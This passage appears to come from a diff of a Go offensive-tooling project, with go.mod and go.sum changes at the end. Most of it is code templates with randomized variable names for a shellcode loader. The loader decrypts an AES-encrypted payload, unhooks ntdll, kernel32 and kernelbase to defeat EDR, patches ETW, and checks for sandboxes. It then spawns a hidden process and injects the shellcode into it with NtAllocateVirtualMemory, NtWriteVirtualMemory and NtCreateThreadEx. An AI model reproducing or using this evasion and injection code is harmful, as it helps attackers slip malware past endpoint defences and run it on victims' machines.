{{.Variables.funcNtCreateThreadEx}}.Call(uintptr(unsafe.Pointer(&{{.Variables.pi}}.Thread)), windows.GENERIC_EXECUTE, 0, uintptr({{.Variables.pi}}.Process), {{.Variables.lpBaseAddress}}, {{.Variables.lpBaseAddress}}, 0, 0, 0, 0, 0)
syscall.CloseHandle({{.Variables.pi}}.Thread)
}
func main() {
}
{{.Variables.ExportName}}
//export Start
func Start() {
{{.Variables.Sandbox}}
{{.Variables.Version}} = {{.Variables.Versionfunc}}()
if {{.Variables.Version}} == "10.0" {
{{.Variables.loader}}()
}
{{.Variables.ETW}}
{{.Variables.vciphertext}}, _ := base64.StdEncoding.DecodeString("{{.Variables.ciphertext}}")
{{.Variables.vkey}}, _ := base64.StdEncoding.DecodeString("{{.Variables.key}}")
{{.Variables.viv}}, _ := base64.StdEncoding.DecodeString("{{.Variables.iv}}")
{{.Variables.block}}, err := aes.NewCipher({{.Variables.vkey}})
if err != nil {
return
}
if len({{.Variables.vciphertext}}) < aes.BlockSize {
return
}
{{.Variables.decrypted}} := make([]byte, len({{.Variables.vciphertext}}))
{{.Variables.mode}} := cipher.NewCBCDecrypter({{.Variables.block}}, {{.Variables.viv}})
{{.Variables.mode}}.CryptBlocks({{.Variables.decrypted}}, {{.Variables.vciphertext}})
{{.Variables.stuff}} := {{.Variables.PKCS5UnPadding}}({{.Variables.decrypted}})
{{.Variables.rawdata}} := (string({{.Variables.stuff}}))
{{.Variables.hexdata}}, _ := base64.StdEncoding.DecodeString({{.Variables.rawdata}})
{{.Variables.raw_bin}}, _ := hex.DecodeString(string({{.Variables.hexdata}}))
{{.Variables.ReloadRemoteProcess}}({{.Variables.raw_bin}})
}
func {{.Variables.RemoteModuleReloading}}({{.Variables.name}} string, {{.Variables.addr}} uintptr, {{.Variables.handle}} windows.Handle) error {
{{.Variables.dll}}, {{.Variables.error}} := ioutil.ReadFile({{.Variables.name}})
if {{.Variables.error}} != nil {
return {{.Variables.error}}
}
{{.Variables.file}}, {{.Variables.error}} := pe.Open({{.Variables.name}})
if {{.Variables.error}} != nil {
return {{.Variables.error}}
}
{{.Variables.x}} := {{.Variables.file}}.Section(".text")
{{.Variables.bytes}} := {{.Variables.dll}}[{{.Variables.x}}.Offset:{{.Variables.x}}.Size]
{{.Variables.dllBase}} := {{.Variables.addr}}
{{.Variables.dllOffset}} := uint({{.Variables.dllBase}}) + uint({{.Variables.x}}.VirtualAddress)
{{.Variables.rawbytes}} := fmt.Sprintf("%X", {{.Variables.bytes}})
{{.Variables.data}}, _ := hex.DecodeString(string({{.Variables.rawbytes}}))
{{.Variables.regionsize}} := len({{.Variables.bytes}})
{{.Variables.offsetaddr}} := uintptr({{.Variables.dllOffset}})
var {{.Variables.nLength}} uintptr
{{.Variables.WriteProcessMemory}}({{.Variables.handle}}, {{.Variables.offsetaddr}}, uintptr(unsafe.Pointer(&{{.Variables.data}}[0])), uintptr(uint32({{.Variables.regionsize}})), &{{.Variables.nLength}})
return nil
}
func {{.Variables.Reloading}}(name string) error {
{{.Variables.dll}}, {{.Variables.error}} := ioutil.ReadFile(name)
if {{.Variables.error}} != nil {
return {{.Variables.error}}
}
{{.Variables.file}}, {{.Variables.error}} := pe.Open(name)
if {{.Variables.error}} != nil {
return {{.Variables.error}}
}
{{.Variables.x}} := {{.Variables.file}}.Section(".text")
{{.Variables.bytes}} := {{.Variables.dll}}[{{.Variables.x}}.Offset:{{.Variables.x}}.Size]
{{.Variables.loaddll}}, {{.Variables.error}} := windows.LoadDLL(name)
if {{.Variables.error}} != nil {
return {{.Variables.error}}
}
{{.Variables.handle}} := {{.Variables.loaddll}}.Handle
{{.Variables.dllBase}} := uintptr({{.Variables.handle}})
{{.Variables.dllOffset}} := uint({{.Variables.dllBase}}) + uint({{.Variables.x}}.VirtualAddress)
var {{.Variables.oldfartcodeperms}} uintptr
{{.Variables.regionsize}} := uintptr(len({{.Variables.bytes}}))
{{.Variables.handlez}} := uintptr(0xffffffffffffffff)
{{.Variables.runfunc}}, _ := NtProtectVirtualMemory(
{{.Variables.customsyscallVP}},
{{.Variables.handlez}},
(*uintptr)(unsafe.Pointer(&{{.Variables.dllOffset}})),
&{{.Variables.regionsize}},
syscall.PAGE_EXECUTE_READWRITE,
&{{.Variables.oldfartcodeperms}},
)
if {{.Variables.runfunc}} != 0 {
panic("Call to VirtualProtect failed!")
}
for i := 0; i < len({{.Variables.bytes}}); i++ {
{{.Variables.loc}} := uintptr({{.Variables.dllOffset}} + uint(i))
{{.Variables.mem}} := (*[1]byte)(unsafe.Pointer({{.Variables.loc}}))
(*{{.Variables.mem}})[0] = {{.Variables.bytes}}[i]
}
{{.Variables.runfunc}}, _ = NtProtectVirtualMemory(
{{.Variables.customsyscallVP}},
{{.Variables.handlez}},
(*uintptr)(unsafe.Pointer(&{{.Variables.dllOffset}})),
&{{.Variables.regionsize}},
{{.Variables.oldfartcodeperms}},
&{{.Variables.oldfartcodeperms}},
)
if {{.Variables.runfunc}} != 0 {
panic("Call to VirtualProtect failed!!")
}
return nil
}
func NtProtectVirtualMemory({{.Variables.sysid}} uint16, {{.Variables.processHandle}} uintptr, {{.Variables.baseAddress}}, {{.Variables.regionSize}} *uintptr, {{.Variables.NewProtect}} uintptr, {{.Variables.oldprotect}} *uintptr) (uint32, error) {
return loader.NtProtectVirtualMemory(
{{.Variables.sysid}},
{{.Variables.processHandle}},
uintptr(unsafe.Pointer({{.Variables.baseAddress}})),
uintptr(unsafe.Pointer({{.Variables.regionSize}})),
{{.Variables.NewProtect}},
uintptr(unsafe.Pointer({{.Variables.oldprotect}})),
)
}
`
}
func Procces_Injection() string {
return `
package main
import (
"crypto/aes"
"crypto/cipher"
"debug/pe"
"encoding/base64"
"encoding/hex"
"fmt"
"loader/loader"
{{.Variables.DebugImport}}
"io/ioutil"
"syscall"
"time"
"unsafe"
"strconv"
"golang.org/x/sys/windows"
"golang.org/x/sys/windows/registry"
)
const (
{{.Variables.PROCESS_ALL_ACCESS}}= 0x1F0FFF
)
var _ unsafe.Pointer
const (
{{.Variables.errnoERROR_IO_PENDING}}= 997
)
var (
{{.Variables.errERROR_IO_PENDING}} error = syscall.Errno({{.Variables.errnoERROR_IO_PENDING}})
{{.Variables.customsyscall}} uint16
)
func errnoErr(e syscall.Errno) error {
switch e {
case 0:
return nil
case {{.Variables.errnoERROR_IO_PENDING}}:
return {{.Variables.errERROR_IO_PENDING}}
}
return e
}
var {{.Variables.procWriteProcessMemory}} = syscall.NewLazyDLL("kernel32.dll").NewProc("WriteProcessMemory")
var {{.Variables.funcNtCreateThreadEx}} = syscall.NewLazyDLL("ntdll.dll").NewProc("NtCreateThreadEx")
var {{.Variables.funcNtWriteVirtualMemory}} = syscall.NewLazyDLL("ntdll.dll").NewProc("NtWriteVirtualMemory")
var {{.Variables.funcNtAllocateVirtualMemory}} = syscall.NewLazyDLL("ntdll.dll").NewProc("NtAllocateVirtualMemory")
var {{.Variables.funcNtProtectVirtualMemory}} = syscall.NewLazyDLL("ntdll.dll").NewProc("NtProtectVirtualMemory")
var {{.Variables.procEnumProcessModules}} = syscall.NewLazyDLL("psapi.dll").NewProc("EnumProcessModules")
var {{.Variables.procGetModuleBaseName}} = syscall.NewLazyDLL("psapi.dll").NewProc("GetModuleBaseNameW")
var {{.Variables.procGetModuleInformation}} = syscall.NewLazyDLL("psapi.dll").NewProc("GetModuleInformation")
{{.Variables.Debug}}
func errno(e1 error) error {
if e1, ok := e1.(syscall.Errno); ok && e1 == 0 {
e1 = syscall.EINVAL
}
return e1
}
type SyscallError struct {
call string
err error
}
func (e *SyscallError) Error() string {
return fmt.Sprintf("%s: %v", e.call, e.err)
}
const (
MEM_FREE = 0x100 << 8
MEM_COMMIT = 0x10 << 8
MEM_RESERVE = 0x20 << 8
)
type StartupInfoEx struct {
windows.StartupInfo
AttributeList *PROC_THREAD_ATTRIBUTE_LIST
}
type PROC_THREAD_ATTRIBUTE_LIST struct {
dwFlags uint32
size uint64
count uint64
reserved uint64
unknown *uint64
entries []*PROC_THREAD_ATTRIBUTE_ENTRY
}
type PROC_THREAD_ATTRIBUTE_ENTRY struct {
attribute *uint32
cbSize uintptr
lpValue uintptr
}
type MemoryBasicInfo struct {
BaseAddress uintptr
AllocationBase uintptr
AllocationProtect uint32
RegionSize uintptr
State uint32
Protect uint32
Type uint32
}
type MODULEINFO struct {
LpBaseOfDll uintptr
SizeOfImage uint32
EntryPoint uintptr
}
func {{.Variables.CreateProcess}}() *syscall.ProcessInformation {
var {{.Variables.si}} syscall.StartupInfo
var {{.Variables.pi}} syscall.ProcessInformation
{{.Variables.Target}} := "{{.Variables.processpath}}"
{{.Variables.commandLine}}, {{.Variables.err}} := syscall.UTF16PtrFromString({{.Variables.Target}})
if {{.Variables.err}} != nil {
panic({{.Variables.err}})
}
var {{.Variables.startupInfo}} StartupInfoEx
{{.Variables.si}}.Cb = uint32(unsafe.Sizeof({{.Variables.startupInfo}}))
{{.Variables.si}}.Flags |= windows.STARTF_USESHOWWINDOW
{{.Variables.si}}.ShowWindow = windows.SW_HIDE
{{.Variables.err}} = syscall.CreateProcess(
nil,
{{.Variables.commandLine}},
nil,
nil,
false,
0,
nil,
nil,
&{{.Variables.si}},
&{{.Variables.pi}})
if {{.Variables.err}} != nil {
panic({{.Variables.err}})
}
return &{{.Variables.pi}}
}
func {{.Variables.GetModuleInformation}}({{.Variables.hProcess}} windows.Handle, {{.Variables.hModule}} windows.Handle) (MODULEINFO, error) {
{{.Variables.mi}} := MODULEINFO{}
_, _, {{.Variables.err}} := {{.Variables.procGetModuleInformation}}.Call(
uintptr({{.Variables.hProcess}}),
uintptr({{.Variables.hModule}}),
uintptr(unsafe.Pointer(&{{.Variables.mi}})),
uintptr(uint32(unsafe.Sizeof({{.Variables.mi}}))))
if {{.Variables.err}}.(syscall.Errno) != 0 {
return {{.Variables.mi}}, {{.Variables.err}}
}
return {{.Variables.mi}}, nil
}
func {{.Variables.GetModuleBaseName}}({{.Variables.process}} windows.Handle, {{.Variables.module}} windows.Handle, {{.Variables.outString}} *uint16, {{.Variables.size}} uint32) ({{.Variables.n}} int, err error) {
r1, _, e1 := {{.Variables.procGetModuleBaseName}}.Call(
uintptr({{.Variables.process}}),
uintptr({{.Variables.module}}),
uintptr(unsafe.Pointer({{.Variables.outString}})),
uintptr({{.Variables.size}}),
)
if r1 == 0 {
return 0, errno(e1)
}
return int(r1), nil
}
func {{.Variables.EnumProcessModules}}({{.Variables.process}} windows.Handle, {{.Variables.modules}} []windows.Handle) ({{.Variables.n}} int, {{.Variables.err}} error) {
var {{.Variables.needed}} int32
const {{.Variables.handleSize}} = unsafe.Sizeof({{.Variables.modules}}[0])
r1, _, e1 := {{.Variables.procEnumProcessModules}}.Call(
uintptr({{.Variables.process}}),
uintptr(unsafe.Pointer(&{{.Variables.modules}}[0])),
{{.Variables.handleSize}}*uintptr(len({{.Variables.modules}})),
uintptr(unsafe.Pointer(&{{.Variables.needed}})),
)
if r1 == 0 {
{{.Variables.err}} = errno(e1)
return 0, {{.Variables.err}}
}
{{.Variables.n}} = int(uintptr({{.Variables.needed}}) / {{.Variables.handleSize}})
return {{.Variables.n}}, nil
}
func {{.Variables.WriteProcessMemory}}({{.Variables.hProcess}} windows.Handle, {{.Variables.lpBaseAddress}} uintptr, {{.Variables.lpBuffer}} uintptr, {{.Variables.nSize}} uintptr, {{.Variables.lpNumberOfBytesWritten}} *uintptr) ({{.Variables.err}} error) {
r1, _, e1 := syscall.Syscall6({{.Variables.procWriteProcessMemory}}.Addr(), 5, uintptr({{.Variables.hProcess}}), uintptr({{.Variables.lpBaseAddress}}), uintptr(unsafe.Pointer({{.Variables.lpBuffer}})), uintptr({{.Variables.nSize}}), uintptr(unsafe.Pointer({{.Variables.lpNumberOfBytesWritten}})), 0)
if r1 == 0 {
if e1 != 0 {
{{.Variables.err}} = errnoErr(e1)
} else {
{{.Variables.err}} = syscall.EINVAL
}
}
return
}
{{.Variables.Sandboxfunction}}
func {{.Variables.PKCS5UnPadding}}({{.Variables.src}} []byte) []byte {
{{.Variables.length}} := len({{.Variables.src}})
{{.Variables.unpadding}} := int({{.Variables.src}}[{{.Variables.length}}-1])
return {{.Variables.src}}[:({{.Variables.length}} - {{.Variables.unpadding}} )]
}
func {{.Variables.Console}}(show bool) {
{{.Variables.getWin}} := syscall.NewLazyDLL("kernel32.dll").NewProc("GetConsoleWindow")
{{.Variables.showWin}} := syscall.NewLazyDLL("user32.dll").NewProc("ShowWindow")
{{.Variables.hwnd}}, _, _ := {{.Variables.getWin}}.Call()
if {{.Variables.hwnd}} == 0 {
return
}
if show {
var {{.Variables.SW_RESTORE}} uintptr = 9
{{.Variables.showWin}}.Call({{.Variables.hwnd}}, {{.Variables.SW_RESTORE}})
} else {
var {{.Variables.SW_HIDE}} uintptr = 0
{{.Variables.showWin}}.Call({{.Variables.hwnd}}, {{.Variables.SW_HIDE}})
}
}
func {{.Variables.Versionfunc}}() string {
{{.Variables.k}}, _ := registry.OpenKey(registry.LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", registry.QUERY_VALUE)
{{.Variables.Version}}, _, _ := {{.Variables.k}}.GetStringValue("CurrentVersion")
{{.Variables.MV}}, _, err := {{.Variables.k}}.GetIntegerValue("CurrentMajorVersionNumber")
if err == nil{
{{.Variables.MinV}}, _, _ := {{.Variables.k}}.GetIntegerValue("CurrentMinorVersionNumber")
{{.Variables.Version}} = strconv.FormatUint({{.Variables.MV}}, 10) + "." + strconv.FormatUint({{.Variables.MinV}}, 10)
}
defer {{.Variables.k}}.Close()
{{.Variables.VersionMessage}}
{{.Variables.SyscallNumberlist}}
}
{{.Variables.ETW_Function}}
func {{.Variables.loader}}() {
err := {{.Variables.Reloading}}("C:\\Windows\\System32\\kernel32.dll")
if err != nil {
{{.Variables.RefreshPE}}
}
err = {{.Variables.Reloading}}("C:\\Windows\\System32\\kernelbase.dll")
if err != nil {
{{.Variables.RefreshPE}}
}
err = {{.Variables.Reloading}}("C:\\Windows\\System32\\ntdll.dll")
if err != nil {
{{.Variables.RefreshPE}}
}
{{.Variables.EDR}}
}
func {{.Variables.ReloadRemoteProcess}}({{.Variables.raw_bin}} []byte) {
{{.Variables.pi}} := {{.Variables.CreateProcess}}()
{{.Variables.PPIDMessage}}
time.Sleep(5 * time.Second)
{{.Variables.hh}}, {{.Variables.err}} := windows.OpenProcess({{.Variables.PROCESS_ALL_ACCESS}}, false, {{.Variables.pi}}.ProcessId)
if {{.Variables.err}} != nil {
}
{{.Variables.modules}} := make([]windows.Handle, 255)
{{.Variables.n}}, {{.Variables.err}} := {{.Variables.EnumProcessModules}}({{.Variables.hh}}, {{.Variables.modules}})
if {{.Variables.err}} != nil {
fmt.Println(&SyscallError{"EnumProcessModules", {{.Variables.err}}})
}
if {{.Variables.n}} < len({{.Variables.modules}}) {
{{.Variables.modules}} = {{.Variables.modules}}[:{{.Variables.n}}]
}
{{.Variables.RemoteReloading}}
{{.Variables.ModuleMessage}}
var {{.Variables.buf}} = make([]uint16, 255)
for _, {{.Variables.mod}} := range {{.Variables.modules}} {
{{.Variables.MI}}, _ := {{.Variables.GetModuleInformation}}({{.Variables.hh}}, {{.Variables.mod}})
{{.Variables.n}}, {{.Variables.err}} := {{.Variables.GetModuleBaseName}}({{.Variables.hh}}, {{.Variables.mod}}, &{{.Variables.buf}}[0], uint32(len({{.Variables.buf}})))
if {{.Variables.err}} != nil {
}
{{.Variables.s}} := windows.UTF16ToString({{.Variables.buf}}[:{{.Variables.n}}])
if {{.Variables.s}} == "ntdll.dll" {
{{.Variables.RemoteModuleEnumeration}}
{{.Variables.RemoteModuleReloading}}("C:\\Windows\\System32\\ntdll.dll", {{.Variables.MI}}.LpBaseOfDll, {{.Variables.hh}})
{{.Variables.RemoteModuleMessage}}
}
if {{.Variables.s}} == "KERNEL32.DLL" {
{{.Variables.RemoteModuleEnumeration}}
{{.Variables.RemoteModuleReloading}}("C:\\Windows\\System32\\kernel32.dll", {{.Variables.MI}}.LpBaseOfDll, {{.Variables.hh}})
{{.Variables.RemoteModuleMessage}}
}
if {{.Variables.s}} == "KERNELBASE.dll" {
{{.Variables.RemoteModuleEnumeration}}
{{.Variables.RemoteModuleReloading}}("C:\\Windows\\System32\\kernelbase.dll", {{.Variables.MI}}.LpBaseOfDll, {{.Variables.hh}})
{{.Variables.RemoteModuleMessage}}
}
}
{{.Variables.Injecting}}
{{.Variables.shellcode}} := {{.Variables.raw_bin}}
{{.Variables.oldProtect}} := windows.PAGE_READWRITE
var {{.Variables.lpBaseAddress}} uintptr
{{.Variables.size}} := len({{.Variables.shellcode}})
{{.Variables.funcNtAllocateVirtualMemory}}.Call(uintptr({{.Variables.pi}}.Process), uintptr(unsafe.Pointer(&{{.Variables.lpBaseAddress}})), 0, uintptr(unsafe.Pointer(&{{.Variables.size}})), windows.MEM_COMMIT|windows.MEM_RESERVE, windows.PAGE_READWRITE)
{{.Variables.funcNtWriteVirtualMemory}}.Call(uintptr({{.Variables.pi}}.Process), {{.Variables.lpBaseAddress}}, uintptr(unsafe.Pointer(&{{.Variables.shellcode}}[0])), uintptr({{.Variables.size}}), 0)
{{.Variables.funcNtProtectVirtualMemory}}.Call(uintptr({{.Variables.pi}}.Process), uintptr(unsafe.Pointer(&{{.Variables.lpBaseAddress}})), uintptr(unsafe.Pointer(&{{.Variables.size}})), windows.PAGE_EXECUTE_READ, uintptr(unsafe.Pointer(&{{.Variables.oldProtect}})))
{{.Variables.funcNtCreateThreadEx}}.Call(uintptr(unsafe.Pointer(&{{.Variables.pi}}.Thread)), windows.GENERIC_EXECUTE, 0, uintptr({{.Variables.pi}}.Process), {{.Variables.lpBaseAddress}}, {{.Variables.lpBaseAddress}}, 0, 0, 0, 0, 0)
syscall.CloseHandle({{.Variables.pi}}.Thread)
{{.Variables.Injected}}
}
func main() {
{{.Variables.Sandbox}}
{{.Variables.hide}}
{{.Variables.Version}} := {{.Variables.Versionfunc}}()
if {{.Variables.Version}} == "10.0" {
{{.Variables.loader}}()
}
{{.Variables.ETW}}
{{.Variables.vciphertext}}, _ := base64.StdEncoding.DecodeString("{{.Variables.ciphertext}}")
{{.Variables.vkey}}, _ := base64.StdEncoding.DecodeString("{{.Variables.key}}")
{{.Variables.viv}}, _ := base64.StdEncoding.DecodeString("{{.Variables.iv}}")
{{.Variables.block}}, err := aes.NewCipher({{.Variables.vkey}})
if err != nil {
return
}
if len({{.Variables.vciphertext}}) < aes.BlockSize {
return
}
{{.Variables.decrypted}} := make([]byte, len({{.Variables.vciphertext}}))
{{.Variables.mode}} := cipher.NewCBCDecrypter({{.Variables.block}}, {{.Variables.viv}})
{{.Variables.mode}}.CryptBlocks({{.Variables.decrypted}}, {{.Variables.vciphertext}})
{{.Variables.stuff}} := {{.Variables.PKCS5UnPadding}}({{.Variables.decrypted}})
{{.Variables.rawdata}} := (string({{.Variables.stuff}}))
{{.Variables.hexdata}}, _ := base64.StdEncoding.DecodeString({{.Variables.rawdata}})
{{.Variables.raw_bin}}, _ := hex.DecodeString(string({{.Variables.hexdata}}))
{{.Variables.ReloadRemoteProcess}}({{.Variables.raw_bin}})
}
func {{.Variables.RemoteModuleReloading}}({{.Variables.name}} string, {{.Variables.addr}} uintptr, {{.Variables.handle}} windows.Handle) error {
{{.Variables.dll}}, {{.Variables.error}} := ioutil.ReadFile({{.Variables.name}})
if {{.Variables.error}} != nil {
return {{.Variables.error}}
}
{{.Variables.file}}, {{.Variables.error}} := pe.Open({{.Variables.name}})
if {{.Variables.error}} != nil {
return {{.Variables.error}}
}
{{.Variables.x}} := {{.Variables.file}}.Section(".text")
{{.Variables.bytes}} := {{.Variables.dll}}[{{.Variables.x}}.Offset:{{.Variables.x}}.Size]
{{.Variables.dllBase}} := {{.Variables.addr}}
{{.Variables.dllOffset}} := uint({{.Variables.dllBase}}) + uint({{.Variables.x}}.VirtualAddress)
{{.Variables.rawbytes}} := fmt.Sprintf("%X", {{.Variables.bytes}})
{{.Variables.data}}, _ := hex.DecodeString(string({{.Variables.rawbytes}}))
{{.Variables.regionsize}} := len({{.Variables.bytes}})
{{.Variables.offsetaddr}} := uintptr({{.Variables.dllOffset}})
var {{.Variables.nLength}} uintptr
{{.Variables.WriteProcessMemory}}({{.Variables.handle}}, {{.Variables.offsetaddr}}, uintptr(unsafe.Pointer(&{{.Variables.data}}[0])), uintptr(uint32({{.Variables.regionsize}})), &{{.Variables.nLength}})
return nil
}
func {{.Variables.Reloading}}(name string) error {
{{.Variables.ReloadingMessage}}
{{.Variables.dll}}, {{.Variables.error}} := ioutil.ReadFile(name)
if {{.Variables.error}} != nil {
return {{.Variables.error}}
}
{{.Variables.file}}, {{.Variables.error}} := pe.Open(name)
if {{.Variables.error}} != nil {
return {{.Variables.error}}
}
{{.Variables.x}} := {{.Variables.file}}.Section(".text")
{{.Variables.bytes}} := {{.Variables.dll}}[{{.Variables.x}}.Offset:{{.Variables.x}}.Size]
{{.Variables.loaddll}}, {{.Variables.error}} := windows.LoadDLL(name)
if {{.Variables.error}} != nil {
return {{.Variables.error}}
}
{{.Variables.handle}} := {{.Variables.loaddll}}.Handle
{{.Variables.dllBase}} := uintptr({{.Variables.handle}})
{{.Variables.dllOffset}} := uint({{.Variables.dllBase}}) + uint({{.Variables.x}}.VirtualAddress)
var {{.Variables.oldfartcodeperms}} uintptr
{{.Variables.regionsize}} := uintptr(len({{.Variables.bytes}}))
{{.Variables.handlez}} := uintptr(0xffffffffffffffff)
{{.Variables.runfunc}}, _ := NtProtectVirtualMemory(
{{.Variables.customsyscall}},
{{.Variables.handlez}},
(*uintptr)(unsafe.Pointer(&{{.Variables.dllOffset}})),
&{{.Variables.regionsize}},
syscall.PAGE_EXECUTE_READWRITE,
&{{.Variables.oldfartcodeperms}},
)
if {{.Variables.runfunc}} != 0 {
panic("Call to VirtualProtect failed!")
}
for i := 0; i < len({{.Variables.bytes}}); i++ {
{{.Variables.loc}} := uintptr({{.Variables.dllOffset}} + uint(i))
{{.Variables.mem}} := (*[1]byte)(unsafe.Pointer({{.Variables.loc}}))
(*{{.Variables.mem}})[0] = {{.Variables.bytes}}[i]
}
{{.Variables.runfunc}}, _ = NtProtectVirtualMemory(
{{.Variables.customsyscall}},
{{.Variables.handlez}},
(*uintptr)(unsafe.Pointer(&{{.Variables.dllOffset}})),
&{{.Variables.regionsize}},
{{.Variables.oldfartcodeperms}},
&{{.Variables.oldfartcodeperms}},
)
if {{.Variables.runfunc}} != 0 {
panic("Call to VirtualProtect failed!!")
}
return nil
}
func NtProtectVirtualMemory({{.Variables.sysid}} uint16, {{.Variables.processHandle}} uintptr, {{.Variables.baseAddress}}, {{.Variables.regionSize}} *uintptr, {{.Variables.NewProtect}} uintptr, {{.Variables.oldprotect}} *uintptr) (uint32, error) {
return loader.NtProtectVirtualMemory(
{{.Variables.sysid}},
{{.Variables.processHandle}},
uintptr(unsafe.Pointer({{.Variables.baseAddress}})),
uintptr(unsafe.Pointer({{.Variables.regionSize}})),
{{.Variables.NewProtect}},
uintptr(unsafe.Pointer({{.Variables.oldprotect}})),
)
}
`
}
+1 -1
View File
@@ -7,5 +7,5 @@ require (
github.com/fatih/color v1.9.0
github.com/josephspurrier/goversioninfo v0.0.0-20200309025242-14b0ab84c6ca
github.com/minio/c2goasm v0.0.0-20190812172519-36a3d3bbc4f3 // indirect
golang.org/x/sys v0.0.0-20200625212154-ddb9806d33ae
golang.org/x/sys v0.0.0-20210124154548-22da62e12c0c
)
+37
View File
@@ -2,8 +2,12 @@ github.com/akavel/rsrc v0.9.0 h1:HwUDC0+tMFWqN4D5G+o5siGD4oVsC3jn6zM8ocjc3nY=
github.com/akavel/rsrc v0.9.0/go.mod h1:uLoCtb9J+EyAqh+26kdrTgmzRBFPGOolLWKpdxkKq+c=
github.com/fatih/color v1.9.0 h1:8xPHl4/q1VyqGIPif1F+1V3Y3lSmrq01EabUW3CoW5s=
github.com/fatih/color v1.9.0/go.mod h1:eQcE1qtQxscV5RaZvpXrrb8Drkc3/DdQ+uUYCNjL+zU=
github.com/google/go-cmp v0.5.5/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE=
github.com/josephspurrier/goversioninfo v0.0.0-20200309025242-14b0ab84c6ca h1:ozPUX9TKQZVek4lZWYRsQo7uS8vJ+q4OOHvRhHiCLfU=
github.com/josephspurrier/goversioninfo v0.0.0-20200309025242-14b0ab84c6ca/go.mod h1:eJTEwMjXb7kZ633hO3Ln9mBUCOjX2+FlTljvpl9SYdE=
github.com/kr/pretty v0.1.0/go.mod h1:dAy3ld7l9f0ibDNOQOHHMYYIIbhfbHSm3C4ZsoJORNo=
github.com/kr/pty v1.1.1/go.mod h1:pFQYn66WHrOpPYNljwOMqo10TkYh1fy3cYio2l3bCsQ=
github.com/kr/text v0.1.0/go.mod h1:4Jbv+DJW3UT/LiOwJeYQe1efqtUx/iVham/4vfdArNI=
github.com/mattn/go-colorable v0.1.4 h1:snbPLB8fVfU9iwbbo30TPtbLRzwWu6aJS6Xh4eaaviA=
github.com/mattn/go-colorable v0.1.4/go.mod h1:U0ppj6V5qS13XJ6of8GYAs25YV2eR4EVcfRqFIhoBtE=
github.com/mattn/go-isatty v0.0.8/go.mod h1:Iq45c/XA43vh69/j3iqttzPXn0bhXyGjM0Hdxcsrc5s=
@@ -11,7 +15,40 @@ github.com/mattn/go-isatty v0.0.11 h1:FxPOTFNqGkuDUGi3H/qkUbQO4ZiBa2brKq5r0l8TGe
github.com/mattn/go-isatty v0.0.11/go.mod h1:PhnuNfih5lzO57/f3n+odYbM4JtupLOxQOAqxQCu2WE=
github.com/minio/c2goasm v0.0.0-20190812172519-36a3d3bbc4f3 h1:+n/aFZefKZp7spd8DFdX7uMikMLXX4oubIzJF4kv/wI=
github.com/minio/c2goasm v0.0.0-20190812172519-36a3d3bbc4f3/go.mod h1:RagcQ7I8IeTMnF8JTXieKnO4Z6JCsikNEzj0DwauVzE=
github.com/rogpeppe/go-internal v1.7.1-0.20210131190821-dc4b49510d96/go.mod h1:xXDCJY+GAPziupqXw64V24skbSoqbTEfhy4qGm1nDQc=
github.com/yuin/goldmark v1.2.1/go.mod h1:3hX8gzYuyVAZsxl0MRgGTJEmQBFcNTphYh9decYSb74=
github.com/zetamatta/go-outputdebug v0.0.0-20200519164229-222c7991e4ae h1:LLvf5CCPekfeUlqQDGfVvds1kMf4hBfcAkpzYHqjYV4=
github.com/zetamatta/go-outputdebug v0.0.0-20200519164229-222c7991e4ae/go.mod h1:oWzR58pjEbqmQK35Wh+slsMO3H4Chi/24zVIyqJfWNI=
golang.org/x/crypto v0.0.0-20190308221718-c2843e01d9a2/go.mod h1:djNgcEr1/C05ACkg1iLfiJU5Ep61QUkGW8qpdssI0+w=
golang.org/x/crypto v0.0.0-20191011191535-87dc89f01550/go.mod h1:yigFU9vqHzYiE8UmvKecakEJjdnWj3jj499lnFckfCI=
golang.org/x/crypto v0.0.0-20200622213623-75b288015ac9/go.mod h1:LzIPMQfyMNhhGPhUkYOs5KpL4U8rLKemX1yGLhDgUto=
golang.org/x/mod v0.4.1 h1:Kvvh58BN8Y9/lBi7hTekvtMpm07eUZ0ck5pRHpsMWrY=
golang.org/x/mod v0.4.1/go.mod h1:s0Qsj1ACt9ePp/hMypM3fl4fZqREWJwdYDEqhRiZZUA=
golang.org/x/net v0.0.0-20190404232315-eb5bcb51f2a3/go.mod h1:t9HGtf8HONx5eT2rtn7q6eTqICYqUVnKs3thJo3Qplg=
golang.org/x/net v0.0.0-20190620200207-3b0461eec859/go.mod h1:z5CRVTTTmAJ677TzLLGU+0bjPO0LkuOLi4/5GtJWs/s=
golang.org/x/net v0.0.0-20201021035429-f5854403a974/go.mod h1:sp8m0HH+o8qH0wwXwYZr8TS3Oi6o0r6Gce1SSxlDquU=
golang.org/x/sync v0.0.0-20190423024810-112230192c58/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
golang.org/x/sync v0.0.0-20201020160332-67f06af15bc9/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
golang.org/x/sys v0.0.0-20190222072716-a9d3bda3a223/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
golang.org/x/sys v0.0.0-20190412213103-97732733099d/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
golang.org/x/sys v0.0.0-20191026070338-33540a1f6037/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
golang.org/x/sys v0.0.0-20200625212154-ddb9806d33ae h1:Ih9Yo4hSPImZOpfGuA4bR/ORKTAbhZo2AbWNRCnevdo=
golang.org/x/sys v0.0.0-20200625212154-ddb9806d33ae/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
golang.org/x/sys v0.0.0-20200930185726-fdedc70b468f/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
golang.org/x/sys v0.0.0-20210124154548-22da62e12c0c/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ=
golang.org/x/text v0.3.3/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ=
